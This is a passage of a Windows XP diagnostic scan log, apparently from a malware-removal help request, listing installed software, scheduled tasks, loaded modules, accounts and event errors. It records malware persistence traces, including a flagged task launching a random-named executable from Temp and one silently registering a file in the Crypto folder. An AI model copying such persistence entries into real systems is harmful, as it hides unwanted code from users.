    Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
    VC80CRTRedist - 8.0.50727.6195 (Version: 1.2.0 - DivX, Inc) Hidden
    Viewpoint Media Player (HKLM\...\ViewpointMediaPlayer) (Version: - )
    Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
    VSO CopyToDVD 4 (HKLM\...\{870F1750-BA89-11DA-A94D-0800200C9A66}_is1) (Version: 4.3.1.11 - VSO Software)
    WD Anywhere Backup (HKLM\...\{68131B0A-D78D-4aed-B74E-33A6C7324E50}) (Version: - Memeo Inc.)
    WD Backup (HKLM\...\{A351224F-533A-4EED-89F4-0BF3417FD31D}) (Version: - ArcSoft)
    WD Diagnostics (HKLM\...\{0AB76F69-E761-4CFA-B9B0-A1906B4E9E4B}) (Version: 1.07.0000 - Western Digital Technologies)
    WD Drive Manager (x86) (HKLM\...\{1C504B59-FFBF-4A65-9E0E-FE06159CAB9B}) (Version: 2.113 - Western Digital)
    WD Firewire HID Driver (HKLM\...\{FD6C6B7F-5696-48C5-A601-2EE9E50C3D46}) (Version: 1.04.0001 - Western Digital Technologies)
    WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
    Windows 7 Upgrade Advisor (HKLM\...\{AB05F2C8-F608-403b-95E1-FD8ADFACD31E}) (Version: 2.0.5000.0 - Microsoft Corporation)
    Windows Defender (HKLM\...\{A06275F4-324B-4E85-95E6-87B2CD729401}) (Version: 1.1.1593.21 - Microsoft Corporation)
    Windows Feature Pack for Storage (32-bit) - IMAPI update for Blu-Ray (HKLM\...\KB952011) (Version: 1.0 - Microsoft Corporation)
    Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140743 - Microsoft Corporation)
    Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version: - )
    Windows Media Player 11 (HKLM\...\Windows Media Player) (Version: - )
    Windows PowerShell(TM) 1.0 (HKLM\...\KB926139-v2) (Version: 2 - Microsoft Corporation)
    Windows XP Service Pack 3 (HKLM\...\Windows XP Service Pack) (Version: 20080414.031525 - Microsoft Corporation)
    WinZip 12.1 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240B8}) (Version: 12.1.8497 - WinZip Computing, S.L. )
    YouTube Downloader App 1.02 (HKLM\...\YouTube Downloader App) (Version: 1.02 - Regensoft)

    ==================== Custom CLSID (selected items): ==========================

    (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\GoogleUpdate.exe (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{1E72F5F2-7DB2-54A7-56F3-81C6B242D95C}\InprocServer32 -> C:\WINDOWS\system32\ole32.dll (Microsoft Corporation)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{5139B445-06CA-4A3F-82F8-030D9F8A1F31}\InprocServer32 -> C:\Documents and Settings\All Users\Application Data\{F8BED27D-15C8-466B-8E3D-1F636A464659}\ddrawex. (the data entry has 11 more characters).
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{5C65F4B0-3651-4514-B207-D10CB699B14B}\localserver32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\Application\41.0.2272.101\delegate_execute.exe (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{7ECD0E2C-3F8E-6CCD-2BAA-51F5C421AA14}\InprocServer32 -> C:\WINDOWS\system32\ole32.dll (Microsoft Corporation)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\psuser.dll (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.25.11\psuser.dl (the data entry has 9 more characters).
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{e3e02f12-2adb-478c-8742-5f0819f9f0f4}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Application Data\Move Networks\plugins\npqmp071701000002.dll (Move Networks)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{e473a65c-8087-49a3-affd-c5bc4a10669b}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Application Data\Move Networks\plugins\npqmp071701000002.dll (Move Networks)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\GoogleUpdateOnDemand.exe (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\psuser.dll (Google Inc.)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{fc345d4c-b8f4-4674-bff7-3c37d2e535ee}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Application Data\Move Networks\plugins\npqmp071701000002.dll (Move Networks)
    CustomCLSID: HKU\S-1-5-21-515967899-117609710-839522115-1004_Classes\CLSID\{fd6484ed-ebe3-4c3d-938a-8238003b41b7}\InprocServer32 -> C:\Documents and Settings\RAUL_104\Application Data\Move Networks\plugins\npqmp071701000002.dll (Move Networks)

    ==================== Restore Points =========================

    28-12-2014 19:03:46 System Checkpoint
    28-12-2014 22:58:01 System Checkpoint
    29-12-2014 23:07:56 System Checkpoint
    30-12-2014 17:07:45 Software Distribution Service 3.0
    31-12-2014 17:08:02 System Checkpoint
    01-01-2015 18:08:00 System Checkpoint
    03-01-2015 05:00:49 Software Distribution Service 3.0
    03-01-2015 23:25:42 Installed MediaImpression
    06-01-2015 17:11:45 Software Distribution Service 3.0
    07-01-2015 18:24:23 System Checkpoint
    08-01-2015 19:13:31 System Checkpoint
    09-01-2015 19:34:12 System Checkpoint
    09-01-2015 23:21:55 Software Distribution Service 3.0
    10-01-2015 23:34:05 System Checkpoint
    12-01-2015 00:33:08 System Checkpoint
    13-01-2015 00:33:56 System Checkpoint
    13-01-2015 20:03:46 Software Distribution Service 3.0
    14-01-2015 20:35:02 System Checkpoint
    14-01-2015 21:26:52 Software Distribution Service 3.0
    15-01-2015 23:49:24 System Checkpoint
    16-01-2015 20:47:36 Restore Operation
    16-01-2015 20:57:03 Restore Operation
    16-01-2015 21:06:16 Restore Operation
    18-01-2015 21:09:57 System Checkpoint
    19-01-2015 21:53:03 System Checkpoint
    23-01-2015 10:03:08 Software Distribution Service 3.0
    27-01-2015 11:12:53 Software Distribution Service 3.0
    11-02-2015 09:46:06 System Checkpoint
    24-02-2015 02:09:59 Installed AVG 2015
    01-03-2015 00:16:23 System Checkpoint
    09-03-2015 11:58:26 Installed AVG 2015
    09-03-2015 12:40:08 Installed AVG 2015
    09-03-2015 12:50:04 Removed AVG 2015
    12-03-2015 12:58:22 System Checkpoint
    19-03-2015 11:04:06 System Checkpoint
    28-03-2015 19:39:52 Installed ID Tool

    ==================== Hosts content: ==========================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2012-06-24 15:11 - 2012-06-24 15:44 - 00000734 ____A C:\WINDOWS\system32\Drivers\etc\hosts
    127.0.0.1 localhost

    ==================== Scheduled Tasks (whitelisted) =============

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
    Task: C:\WINDOWS\Tasks\ConfigExec.job => C:\WINDOWS\system32\rundll32.exeSC:\Program Files\Microsoft Fix it Center\MatsApi.dll
    Task: C:\WINDOWS\Tasks\CryptoUpdate.job => C:\WINDOWS\system32\regsvr32.exe]/s C:\Documents and Settings\RAUL_104\Application Data\Microsoft\Crypto\RSA\cert_v95_0.tpl
    Task: C:\WINDOWS\Tasks\DataUpload.job => C:\WINDOWS\system32\rundll32.exeGC:\Program Files\Microsoft Fix it Center\MatsApi.dll
    Task: C:\WINDOWS\Tasks\dluddia.job => C:\DOCUME~1\RAUL_104\LOCALS~1\Temp\ixnazhk.exe <==== ATTENTION
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-515967899-117609710-839522115-1004Core.job => C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-515967899-117609710-839522115-1004UA.job => C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\GoogleUpdate.exe
    Task: C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Logon.job => C:\WINDOWS\system32\xp_eos.exe
    Task: C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Monthly.job => C:\WINDOWS\system32\xp_eos.exe
    Task: C:\WINDOWS\Tasks\MP Scheduled Scan.job => C:\Program Files\Windows Defender\MpCmdRun.exe
    Task: C:\WINDOWS\Tasks\PCDoctorBackgroundMonitorTask.job => C:\Program Files\My Dell\uaclauncher.exeq-backgroundmon scripts\backgroundmon.xml
    Task: C:\WINDOWS\Tasks\SystemToolsDailyTest.job => C:\Program Files\My Dell\uaclauncher.exe

    ==================== Loaded Modules (whitelisted) ==============

    2013-10-14 01:01 - 2013-09-26 17:59 - 00276808 ____N () c:\windows\system32\iherf\shim_xskeqjbwy.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00239944 ____N () c:\windows\system32\iherf\mcapp_kmilhiyul.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 02763080 ____N () c:\windows\system32\iherf\mcsc_fyxinitei.dll
    2010-06-15 21:50 - 2009-11-05 08:39 - 00087552 _____ () C:\WINDOWS\system32\cpwmon2k.dll
    2010-12-16 01:42 - 2009-11-04 09:14 - 00157696 _____ () C:\WINDOWS\System32\spool\PRTPROCS\W32X86\dleadrpp.dll
    2011-09-27 08:23 - 2011-09-27 08:23 - 00087912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
    2011-09-27 08:22 - 2011-09-27 08:22 - 01242472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
    2010-12-16 01:41 - 2010-01-07 17:09 - 00098984 _____ () C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\dleaserv.exe
    2010-05-14 12:59 - 2010-05-14 12:59 - 00455944 _____ () C:\Program Files\Flip Video\FlipShare\FlipShareService.exe
    2010-05-14 12:38 - 2010-05-14 12:38 - 01581056 _____ () C:\Program Files\Flip Video\FlipShare\QtCore4.dll
    2010-05-14 12:49 - 2010-05-14 12:49 - 02519040 _____ () C:\Program Files\Flip Video\FlipShare\Core.dll
    2010-05-14 12:38 - 2010-05-14 12:38 - 00188416 _____ () C:\Program Files\Flip Video\FlipShare\QtSql4.dll
    2010-05-14 12:38 - 2010-05-14 12:38 - 00356352 _____ () C:\Program Files\Flip Video\FlipShare\QtXml4.dll
    2010-05-14 12:38 - 2010-05-14 12:38 - 06443008 _____ () C:\Program Files\Flip Video\FlipShare\QtGui4.dll
    2010-05-14 12:41 - 2010-05-14 12:41 - 00708608 _____ () C:\Program Files\Flip Video\FlipShare\qca2.dll
    2014-03-28 05:35 - 2014-03-28 05:35 - 00093696 _____ () C:\Program Files\FileZilla FTP Client\fzshellext.dll
    2009-01-10 18:15 - 2009-01-10 18:15 - 00159744 _____ () C:\Program Files\Haali\MatroskaSplitter\mmfinfo.dll
    2009-01-10 18:14 - 2009-01-10 18:14 - 00023552 _____ () C:\Program Files\Haali\MatroskaSplitter\mkunicode.dll
    2009-03-26 14:28 - 2004-04-11 20:57 - 00040960 ____N () C:\Program Files\Dell\Media Experience\DirWatcher.dll
    2009-10-14 14:36 - 2009-10-14 14:36 - 02793304 _____ () C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe
    2010-12-16 01:33 - 2011-01-23 21:22 - 00770728 _____ () C:\Program Files\Dell V310-V510 Series\dleamon.exe
    2010-12-16 01:31 - 2009-11-26 05:49 - 00086180 _____ () C:\Program Files\Dell V310-V510 Series\dleacfg.dll
    2010-12-16 01:33 - 2010-04-01 14:23 - 00389120 _____ () C:\Program Files\Dell V310-V510 Series\dleascw.dll
    2010-12-16 01:40 - 2009-05-27 08:16 - 00192512 _____ () C:\WINDOWS\system32\spool\drivers\w32x86\3\dleadatr.dll
    2010-12-16 01:33 - 2010-04-01 14:24 - 01159168 _____ () C:\Program Files\Dell V310-V510 Series\dleaDRS.dll
    2010-12-16 01:33 - 2009-03-10 02:43 - 00155648 _____ () C:\Program Files\Dell V310-V510 Series\dleacaps.dll
    2010-12-16 01:33 - 2009-03-05 14:55 - 00059904 _____ () C:\Program Files\Dell V310-V510 Series\dleacnv4.dll
    2010-12-16 01:30 - 2009-02-20 04:49 - 00299008 _____ () C:\WINDOWS\system32\dleasm.dll
    2010-12-16 01:30 - 2009-02-20 04:50 - 00028672 _____ () C:\WINDOWS\system32\dleasmr.dll
    2010-12-16 01:33 - 2011-01-23 21:22 - 00139944 _____ () C:\Program Files\Dell V310-V510 Series\ezprint.exe
    2010-12-16 01:33 - 2009-06-22 10:08 - 00708608 _____ () C:\Program Files\Dell V310-V510 Series\Epwizard.DLL
    2010-12-16 01:33 - 2009-06-22 10:06 - 00159744 _____ () C:\Program Files\Dell V310-V510 Series\customui.dll
    2010-12-16 01:33 - 2009-06-22 10:06 - 00114688 _____ () C:\Program Files\Dell V310-V510 Series\Eputil.DLL
    2010-12-16 01:33 - 2009-06-22 10:05 - 00139264 _____ () C:\Program Files\Dell V310-V510 Series\Imagutil.DLL
    2010-12-16 01:33 - 2009-06-22 10:06 - 00061440 _____ () C:\Program Files\Dell V310-V510 Series\Epfunct.DLL
    2010-12-16 01:33 - 2009-06-22 10:08 - 02203648 _____ () C:\Program Files\Dell V310-V510 Series\EPWizRes.dll
    2010-12-16 01:33 - 2009-06-22 10:08 - 00045056 _____ () C:\Program Files\Dell V310-V510 Series\epstring.dll
    2010-12-16 01:33 - 2009-06-22 10:08 - 00196608 _____ () C:\Program Files\Dell V310-V510 Series\EPOEMDll.dll
    2010-12-16 01:33 - 2009-04-07 16:25 - 00409600 _____ () C:\Program Files\Dell V310-V510 Series\iptk.dll
    2010-12-16 01:33 - 2009-03-02 11:25 - 00151552 _____ () C:\Program Files\Dell V310-V510 Series\dleaptp.dll
    2011-03-21 17:10 - 2011-07-28 19:08 - 01259376 _____ () C:\Program Files\DivX\DivX Update\DivXUpdate.exe
    2011-03-21 17:10 - 2011-07-28 19:09 - 00096112 _____ () C:\Program Files\DivX\DivX Update\DivXUpdateCheck.dll
    2004-08-04 06:00 - 2008-04-13 20:11 - 00014336 _____ () C:\WINDOWS\system32\msdmo.dll
    2011-04-26 16:23 - 2011-04-26 16:23 - 00223088 _____ () C:\Program Files\Motorola\MotoHelper\MotoHelperService.exe
    2009-10-14 14:34 - 2009-10-14 14:34 - 00560472 _____ () C:\Program Files\Common Files\Logishrd\LQCVFX\COCIManager.exe
    2011-04-26 16:22 - 2011-04-26 16:22 - 00681840 _____ () C:\Program Files\Motorola\MotoHelper\MotoHelperAgent.exe
    2010-12-16 01:40 - 2009-12-16 07:42 - 00167936 _____ () C:\Program Files\Dell\V310-V510 Series\dleamicro.dll
    2010-12-16 01:40 - 2009-12-16 13:07 - 01159168 _____ () C:\Program Files\Dell\V310-V510 Series\dleadrs.dll
    2010-12-16 01:40 - 2009-11-26 04:49 - 00086180 _____ () C:\Program Files\Dell\V310-V510 Series\dleacfg.dll
    2010-12-16 01:40 - 2009-03-10 01:43 - 00155648 _____ () C:\Program Files\Dell\V310-V510 Series\dleacaps.dll
    2010-12-16 01:40 - 2009-03-05 13:55 - 00059904 _____ () C:\Program Files\Dell\V310-V510 Series\dleacnv4.dll
    2013-10-14 01:02 - 2013-09-26 17:59 - 00239944 ____N () c:\windows\system32\iherf\svcboot_tdcreqqfu.dll
    2013-10-14 01:01 - 2013-09-26 17:58 - 02529608 ____N () c:\windows\system32\iherf\Director_kfxdjwdew.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00313672 ____N () c:\windows\system32\iherf\Proxy.dll
    2013-10-14 01:01 - 2013-09-26 17:58 - 00285000 ____N () c:\windows\system32\iherf\dprx_xwnyubbfm.dll
    2013-10-14 01:01 - 2013-09-26 17:58 - 00362824 ____N () c:\windows\system32\iherf\ccp_osiikbkwz.dll
    2013-10-14 01:00 - 2013-09-26 15:13 - 00047616 ____N () c:\windows\system32\iherf\LiteUnzip.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00231752 ____N () c:\windows\system32\iherf\mcmsg_krrxdcxgc.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00538952 ____N () c:\windows\system32\iherf\mca_cfregooed.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00231752 ____N () c:\windows\system32\iherf\mcy_cwlnafqoh.dll
    2013-10-14 01:00 - 2013-09-26 17:59 - 01386824 ____N () c:\windows\system32\iherf\mcsky_cigwikaur.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00309576 ____N () c:\windows\system32\iherf\mco_flwchjfak.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00313672 ____N () c:\windows\system32\iherf\mcoexp_tqxbfwbqk.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00248136 ____N () c:\windows\system32\iherf\mclmd_njudaomov.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 02812232 ____N () c:\windows\system32\iherf\mck_aicsxezuy.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 02963784 ____N () c:\windows\system32\iherf\mcie_doxecbadk.dll
    2013-10-14 01:01 - 2013-09-26 17:59 - 00555336 ____N () c:\windows\system32\iherf\mcff_brgbmoikc.dll
    2013-10-14 01:00 - 2013-09-26 17:59 - 03311944 ____N () c:\windows\system32\iherf\mcgc_ghkvkhoxf.dll
    2009-03-26 13:16 - 2005-09-01 05:25 - 00045056 ____N () C:\Program Files\Compact Wireless-G USB Adapter Wireless Network Monitor\Security.dll
    2009-03-26 13:16 - 2002-04-24 01:00 - 00110592 _____ () C:\Program Files\Compact Wireless-G USB Adapter Wireless Network Monitor\GEMWEP.DLL
    2009-03-26 13:16 - 2003-10-13 16:30 - 00094208 _____ () C:\WINDOWS\system32\GTW32N50.dll
    2009-03-26 13:16 - 2004-09-29 16:51 - 00122880 _____ () C:\Program Files\Compact Wireless-G USB Adapter Wireless Network Monitor\ez54g.dll
    2009-03-26 13:16 - 2005-02-24 21:15 - 00102400 _____ () C:\Program Files\Compact Wireless-G USB Adapter Wireless Network Monitor\ses_cl.dll
    2009-04-09 19:04 - 2009-04-09 19:04 - 02141008 _____ () C:\Program Files\Logitech\Vid HD\QtCore4.dll
    2009-03-03 18:17 - 2009-03-03 18:17 - 07704400 _____ () C:\Program Files\Logitech\Vid HD\QtGui4.dll
    2009-04-22 17:53 - 2009-04-22 17:53 - 00969040 _____ () C:\Program Files\Logitech\Vid HD\QtNetwork4.dll
    2009-03-03 18:17 - 2009-03-03 18:17 - 00475472 _____ () C:\Program Files\Logitech\Vid HD\QtOpenGL4.dll
    2009-03-03 18:17 - 2009-03-03 18:17 - 00363856 _____ () C:\Program Files\Logitech\Vid HD\QtXml4.dll
    2009-03-03 18:17 - 2009-03-03 18:17 - 00200016 _____ () C:\Program Files\Logitech\Vid HD\QtSql4.dll
    2010-10-29 16:01 - 2010-10-29 16:01 - 00027472 _____ () C:\Program Files\Logitech\Vid HD\SDL.dll
    2009-03-03 18:17 - 2009-03-03 18:17 - 11311952 _____ () C:\Program Files\Logitech\Vid HD\QtWebKit4.dll
    2009-03-03 18:17 - 2009-03-03 18:17 - 00291664 _____ () C:\Program Files\Logitech\Vid HD\phonon4.dll
    2010-10-29 16:02 - 2010-10-29 16:02 - 00751616 _____ () C:\Program Files\Logitech\Vid HD\vpxmd.dll
    2009-03-03 18:18 - 2009-03-03 18:18 - 00029008 _____ () C:\Program Files\Logitech\Vid HD\plugins\imageformats\qgif4.dll
    2009-03-03 18:18 - 2009-03-03 18:18 - 00035152 _____ () C:\Program Files\Logitech\Vid HD\plugins\imageformats\qico4.dll
    2009-03-03 18:18 - 2009-03-03 18:18 - 00138064 _____ () C:\Program Files\Logitech\Vid HD\plugins\imageformats\qjpeg4.dll
    2004-08-04 06:00 - 2008-04-13 20:11 - 00059904 _____ () C:\WINDOWS\system32\devenum.dll

    ==================== Alternate Data Streams (whitelisted) =========

    (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

    AlternateDataStreams: C:\WINDOWS:1AD20FA131D5A83D
    AlternateDataStreams: C:\WINDOWS\system32:d99eddf6.zreglib

    ==================== Safe Mode (whitelisted) ===================

    (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ioloSystemService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ioloSystemService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

    ==================== EXE Association (whitelisted) ===============

    (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-515967899-117609710-839522115-1004\Control Panel\Desktop\\Wallpaper -> C:\Documents and Settings\RAUL_104\Application Data\Microsoft\Internet Explorer\Internet Explorer Wallpaper.bmp
    DNS Servers: 209.18.47.61 - 209.18.47.62

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    (Currently there is no automatic fix for this section.)


    ==================== Accounts: =============================

    Administrator (S-1-5-21-515967899-117609710-839522115-500 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\Administrator
    AMY_106 (S-1-5-21-515967899-117609710-839522115-1006 - Limited - Enabled) => %SystemDrive%\Documents and Settings\AMY_106
    AMY_1061 (S-1-5-21-515967899-117609710-839522115-1009 - Limited - Enabled) => %SystemDrive%\Documents and Settings\AMY_1061
    ASPNET (S-1-5-21-515967899-117609710-839522115-1007 - Limited - Enabled)
    Guest (S-1-5-21-515967899-117609710-839522115-501 - Limited - Enabled) => %SystemDrive%\Documents and Settings\Guest
    HelpAssistant (S-1-5-21-515967899-117609710-839522115-1000 - Limited - Disabled)
    RAUL_104 (S-1-5-21-515967899-117609710-839522115-1004 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\RAUL_104
    RAUL_106 (S-1-5-21-515967899-117609710-839522115-1005 - Limited - Enabled) => %SystemDrive%\Documents and Settings\RAUL_106
    SUPPORT_388945a0 (S-1-5-21-515967899-117609710-839522115-1002 - Limited - Disabled)

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (03/28/2015 07:24:36 PM) (Source: MsiInstaller) (EventID: 11706) (User: RAUL-104)
    Description: Product: HP Photo and Imaging 2.2 - Scanjet 3970 Series -- Error 1706.No valid source could be found for product HP Photo and Imaging 2.2 - Scanjet 3970 Series. The Windows Installer cannot continue.

    Error: (03/28/2015 07:22:49 PM) (Source: .NET Runtime 2.0 Error Reporting) (EventID: 5000) (User: )
    Description: EventType clr20r3, P1 kies.exe, P2 1.0.0.893, P3 5073d4b9, P4 kies, P5 1.0.0.893, P6 5073d4b9, P7 2d, P8 0, P9 clr20r30, P10 clr20r31.

    Error: (03/28/2015 07:19:18 PM) (Source: MemeoBackgroundService) (EventID: 0) (User: )
    Description: Problem starting Memeo Background Service :.Config file 'C:\Program Files\WD\WD Anywhere Backup\MemeoBackgroundService.exe.config' cannot be read successfully due to exception 'System.IO.FileNotFoundException: The system cannot find the file specified. (Exception from HRESULT: 0x80070002)
    at System.ConfigServer.RunParser(IConfigHandler factory, String fileName)
    at System.ConfigTreeParser.Parse(String fileName, String configPath, Boolean skipSecurityStuff)
    at System.Runtime.Remoting.Activation.RemotingXmlConfigFileParser.ParseConfigFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)'. at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.DoConfiguration(String filename, Boolean ensureSecurity)
    at System.Runtime.Remoting.RemotingConfiguration.Configure(String filename, Boolean ensureSecurity)
    at RemoteServerService.MemeoBackgroundService.OnStart(String[] args)

    Error: (03/28/2015 07:05:37 PM) (Source: .NET Runtime 2.0 Error Reporting) (EventID: 5000) (User: )
    Description: EventType clr20r3, P1 kies.exe, P2 1.0.0.893, P3 5073d4b9, P4 kies, P5 1.0.0.893, P6 5073d4b9, P7 2d, P8 0, P9 clr20r30, P10 clr20r31.

    Error: (03/28/2015 07:02:17 PM) (Source: MemeoBackgroundService) (EventID: 0) (User: )
    Description: Problem starting Memeo Background Service :.Config file 'C:\Program Files\WD\WD Anywhere Backup\MemeoBackgroundService.exe.config' cannot be read successfully due to exception 'System.IO.FileNotFoundException: The system cannot find the file specified. (Exception from HRESULT: 0x80070002)
    at System.ConfigServer.RunParser(IConfigHandler factory, String fileName)
    at System.ConfigTreeParser.Parse(String fileName, String configPath, Boolean skipSecurityStuff)
    at System.Runtime.Remoting.Activation.RemotingXmlConfigFileParser.ParseConfigFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)'. at System.Runtime.Remoting.RemotingConfigHandler.LoadConfigurationFromXmlFile(String filename)
    at System.Runtime.Remoting.RemotingConfigHandler.DoConfiguration(String filename, Boolean ensureSecurity)
    at System.Runtime.Remoting.RemotingConfiguration.Configure(String filename, Boolean ensureSecurity)
    at RemoteServerService.MemeoBackgroundService.OnStart(String[] args)

